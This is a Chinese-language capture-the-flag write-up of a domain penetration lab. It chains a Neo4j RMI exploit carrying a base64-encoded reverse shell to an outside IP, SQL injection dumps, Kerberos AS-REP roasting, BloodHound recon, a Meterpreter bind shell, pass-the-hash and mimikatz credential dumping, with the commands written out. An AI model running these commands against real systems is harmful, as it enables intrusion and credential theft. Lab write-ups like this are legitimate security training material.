春秋云镜Time
春秋云镜Time
flag01
端口扫描
7687和7474是neo4j,直接找cve
https://github.com/zwjjustdoit/CVE-2021-34371.jar?tab=readme-ov-file
1 | java -jar rhino_gadget.jar rmi://39.99.224.197:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuODAuMTUyLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" |
flag02
将fscan,frp下载到靶机
服务器python起http服务就行
1 | python3 -m http.server 8080 |
查看ip
1 | 172.22.6.12 域控 |
挂代理访问开始
尝试了一番弱密码,无用,sqlmap跑了跑发现可以
sql注入得到第二个flag
1 | python3 sqlmap.py -r 1.txt -D oa_db -T oa_f1Agggg -dump -batch |
把users表中的用户名收集成字典username.txt,将下面命令生成的csv粘贴到usersname.txt里
1 | python3 sqlmap.py -r 1.txt --dump -D oa_db -T oa_users -C email |
在kerberos的AS-REQ认证中当cname值中的用户不存在时返回包提示KDC_ERR_C_PRINCIPAL_UNKNOWN,所以当我们没有域凭证时,可以通过Kerberos pre-auth从域外对域用户进行用户枚举
对于域用户,如果设置了选项Do not require Kerberos preauthentication(不要求Kerberos预身份认证),此时向域控制器的88端口发送AS-REQ请求,对收到的AS-REP内容重新组合,能够拼接成”Kerberos 5 AS-REP etype 23”(18200)的格式,接下来可以使用hashcat或是john对其破解,最终获得该用户的明文口令
将kerbrute_linux_386 userenum,username.txt上传到最开始的主机上
1 | proxychains ./kerbrute_linux userenum --dc 172.22.6.12 -d xiaorang.lab 2.txt -t 10 |
1 | hashcat -m 18200 --force -a 0 "$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:b6c410706b5e96c693b2fc61ee1064c3$2dc9fbee784e7997333f30c6bc4298ab5752ba94be7022e807af418c11359fd92597e253752f4e61d2d18a83f19b5c9df4761e485853a3d879bcf7a270d6f846683b811a80dda3809528190d7f058a24996aff13094ff9b32c0e2698f6d639b4d237a06d13c309ce7ab428656b79e582609240b01fb5cd47c91573f80f846dc483a113a86977486cecce78c03860050a81ee19921d3500f36ff39fa77edd9d5614cf4b9087d3e42caef68313d1bb0c4f6bc5392943557b584521b305f61e418eb0f6eb3bf339404892da55134cb4bf828ac318fe00d68d1778b7c82caf03b65f1938e54ed3fa51b63cdb2994" rockyou.txt |
1 | hashcat -m 18200 --force -a 0 "$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:971802b84ce99050ad3c5f49d11fd0b7$6c1be075c3cf2a7695529de2ebbf39c5ec7e5326c9d891dac2107b239892f76befe52c860e4e1e2ff6537a5765a6bcb6b8baca792d60765ac0bbe1b3c5e59f3ec51b7426636a437d5df12130eb68d9b17ef431455415671c7331a17ce823e28cc411677bed341d3fceefc3451b8b232ea6039661625a5c793e30c4d149b2ed9d2926e9d825b3828744ebce69e47746994c9a749ceeb76c560a1840bc74d2b9f301bb5b870c680591516354460dab2238e7827900ed80320dd3a6f46874b1bc8a3a68aea7bd11d0683ec94103f59d9511691090928e98d0d8978f511e71fd9db0067fa0d450c120f3726918d7" rockyou.txt |
1 zhangxin@XIAORANG.LAB/strawberry
登录172.22.6.25
利用SharpHound进行信息搜集
1 | SharpHound.exe -c all |
导出来的压缩包放到kali上
flag03&4
kali起动
1 | neo4j start |
我不理解我上传压缩包的时候为甚一直是0%
好像是下载的bloodhound和SharpHound版本对不上。。。,我的SharpHound版本过于高了,建议换低一点的版本
启动之后,直接把压缩包拖入就可以了
借用一下图
可以利用这个工具得知我们要攻击的具体路径和大题思路
可以看到,在172.22.6.25这个用户机,运行登录的用户有三个
而yuxuan 用户滥用了SID历史功能(SIDHistory是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的SID作为该对象的objectSid,在之前域中的SID会添加到该对象的sIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限)
HasSession:用户与计算机时进行会话时,凭据会保留在内存中,说明yuxuan这个用户登录过WIN2019
很多用户习惯将计算机设置自动登录,可以使用MSF抓取自动登录的用户名和密码
先生成一个正向shell,上传到WIN2019后运行
1 | msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o bind_shell.exe |
1 | meterpreter > run windows/gather/credentials/windows_autologin |
得到密码
1 | yuxuan/Yuxuan7QbrgZ3L |
重新进行远程登录不过用户名密码不一样
我很疑惑我这里为什么显示登录失败,好吧,连接不稳定的原因
HasSIDHistory:用户的SID历史记录,用户在域迁移后,票据还包含着前域所在组的SID,虽然用户不属于前域,但仍拥有前域的权限
使用yuxuan这个用户抓Administrator的哈希
登录之后就可以用猕猴桃了,
去找域控用户的hash(虽然我连不上,我记录一下吧
1 | proxychains crackmapexec smb 172.22.6.25 -u administrator -H04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt" |
利用smb读flag4,这俩都行
1 | proxychains python3 smbexec.py XIAORANG/administrator@172.22.6.25 -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 |
总结
这次靶机挺难评的,有学到了新工具的利用,neo4j+bloodhound,还有相对应的信息收集工具SharpHound
可是我到最后也没导入成功,不是为啥啊。。。还有172.22.6.25的远程桌面连接上yuxuan,一直显示我登陆凭证过期,emmm,密码也没有错,前面那个也能登录,可是yuxuan就是登不上,挺难崩的
第三个靶场了,感觉域渗透的过程也有点熟悉了
印象蛮深的就是这个猕猴桃
1 | mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" |